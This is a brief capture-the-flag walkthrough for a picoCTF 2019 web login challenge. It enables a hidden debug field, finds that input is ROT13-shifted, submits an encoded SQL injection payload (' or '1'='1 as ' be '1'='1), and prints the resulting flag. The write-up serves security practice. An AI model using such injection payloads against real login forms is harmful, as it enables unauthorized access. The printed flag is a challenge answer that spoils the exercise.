There is a secure website running at https://2019shell1.picoctf.com/problem/32237/arrow-up-right (link) or http://2019shell1.picoctf.com:32237arrow-up-right. Try to see if you can login as admin!
Websitearrow-up-right
There is a hidden form field named debug. Set it to 1.
debug
1
Sign in as password: abcdefghijklmnopqrstuvwxyz
abcdefghijklmnopqrstuvwxyz
Decode caesar cipher that is shown: nopqrstuvwxyzabcdefghijklm with https://cryptii.com/pipes/caesar-cipherarrow-up-right to find 13 is the offset
nopqrstuvwxyzabcdefghijklm
13
Encode ' or '1'='1 with offset 13 with same website to get ' be '1'='1
' or '1'='1
' be '1'='1
Paste ' be '1'='1 into password to get flag
picoCTF{3v3n_m0r3_SQL_5c27c4ea}
Last updated 4 years ago
